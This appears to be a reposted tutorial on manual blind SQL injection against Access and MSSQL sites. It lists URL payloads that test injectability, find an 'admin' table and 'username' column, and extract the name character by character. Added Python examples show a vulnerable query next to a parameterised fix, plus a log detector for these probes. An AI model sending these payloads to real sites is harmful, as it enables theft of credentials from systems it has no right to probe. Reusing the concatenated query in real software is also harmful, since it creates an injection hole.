Manually checking whether injection is possible
Source: Internet | Editor: 程序博客网 | Time: 2024/04/27 21:17
Author: yjd
□ Check whether injection is possible
============================================================ ==================
http://url/xx?id=1111 and 1=1 (normal page)
http://url/xx?id=1111 and 1=2 (error page)
============================================================ ==================
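Why the two responses above differ, and why validating and binding the parameter removes the difference, as an added example that is not part of the original page. It runs against an in-memory SQLite database; the `news` table, the sample rows and the function names are assumptions for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; "admin"/"username" mirror the names used on this page,
    # the "news" table is a hypothetical stand-in for whatever /xx reads.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT);
        INSERT INTO news  VALUES (1111, 'sample article');
        INSERT INTO admin VALUES (1, 'admin');
    """)
    return db

def vulnerable_lookup(db, id_param):
    # Weak form: the request value becomes part of the SQL text, so
    # "1111 and 1=2" changes the WHERE clause and therefore the page.
    row = db.execute("SELECT title FROM news WHERE id = " + id_param).fetchone()
    return row[0] if row else None

def hardened_lookup(db, id_param):
    # Corrected form: accept only a plain integer, then bind it as a value.
    # Anything else is rejected the same way, so the response carries no signal.
    if not re.fullmatch(r"[0-9]{1,18}", id_param):
        return None
    row = db.execute("SELECT title FROM news WHERE id = ?", (int(id_param),)).fetchone()
    return row[0] if row else None

def responses_differ(lookup):
    # The page's first check: does "and 1=1" render differently from "and 1=2"?
    db = make_db()
    return lookup(db, "1111 and 1=1") != lookup(db, "1111 and 1=2")

if __name__ == "__main__":
    print("vulnerable handler leaks a true/false signal:", responses_differ(vulnerable_lookup))
    print("hardened handler leaks a true/false signal:  ", responses_differ(hardened_lookup))
```

Every later check on this page relies on the same true/false page difference, so a handler for which `responses_differ` is false answers none of them.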
□ Check for the table
============================================================ ==================
http://url/xx?id=1111 and exists (select * from admin)
============================================================ ==================
□ Check for the column
============================================================ ==================
http://url/xx?id=1111 and exists (select username from admin)
============================================================ ==================
□ Check the ID
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where ID=1)
============================================================ ==================
□ Check the length
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)
============================================================ ==================
□ Check whether the database is MSSQL
============================================================ ==================
http://url/xx?id=1111 and exists (select * from sysobjects)
============================================================ ==================
□ Check whether the character is English
============================================================ ==================
(ACCESS database)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL database)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
============================================================ ==================
□ Narrow down the range of the English character
============================================================ ==================
(ACCESS database)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL database)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
============================================================ ==================
□ Determine which character it is
============================================================ ==================
(ACCESS database)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL database)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
============================================================ ===================
Common functions
============================================================ ===================
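Access: asc(character)  SQL Server: unicode(character)
Purpose: returns the ASCII code of a character
Access: chr(number)  SQL Server: nchar(number)
Purpose: the inverse of asc; returns the character for a given ASCII code
Access: mid(string, N, L)  SQL Server: substring(string, N, L)
Purpose: returns the substring of length L starting at character N, i.e. the characters between N and N+L
Access: abs(number)  SQL Server: abs(number)
Purpose: returns the absolute value of a number (used when guessing Chinese characters)
Access: A between B And C  SQL Server: A between B And C
Purpose: tests whether A lies between B and C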
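The probe shapes listed on this page are easy to recognise in web server logs. The following added example (not part of the original page) flags them per client; the simplified log format, the signature names and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures for the probe shapes on this page, matched after URL-decoding.
SIGNATURES = {
    "boolean_test":  re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "exists_select": re.compile(r"\bexists\s*\(\s*select\b"),
    "char_extract":  re.compile(r"\b(?:asc|unicode)\s*\(\s*(?:mid|substring)\s*\("),
    "length_probe":  re.compile(r"\blen\s*\(\s*\w+\s*\)\s*="),
    "mssql_catalog": re.compile(r"\bsysobjects\b"),
}
# Assumed log format: client "GET target HTTP/x.y" status
REQUEST = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3})$')

def classify(target):
    """Return the sorted signature names matching one request target."""
    query = target.partition("?")[2]
    decoded = unquote_plus(query).lower()
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def flag_requests(lines):
    """Map client address -> set of signature names seen in its requests."""
    hits = defaultdict(set)
    for line in lines:
        m = REQUEST.match(line.strip())
        if m:
            hits[m.group(1)].update(classify(m.group(2)))
    return {client: tags for client, tags in hits.items() if tags}

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 "GET /xx?id=1111 HTTP/1.1" 200',
    '198.51.100.7 "GET /xx?id=1111%20and%201=1 HTTP/1.1" 200',
    '198.51.100.7 "GET /xx?id=1111%20and%201=2 HTTP/1.1" 500',
    '198.51.100.7 "GET /xx?id=1111+and+exists+(select+*+from+sysobjects) HTTP/1.1" 200',
    '198.51.100.7 "GET /xx?id=1111%20and%20exists%20(select%20id%20from%20admin'
    '%20where%20asc(mid(username,1,1))=97%20and%20ID=1) HTTP/1.1" 200',
]

if __name__ == "__main__":
    for client, tags in flag_requests(SAMPLE_LOG).items():
        print(client, sorted(tags))
```

A single client producing `boolean_test` followed by `exists_select` and `char_extract` hits against the same parameter matches the sequence this page walks through.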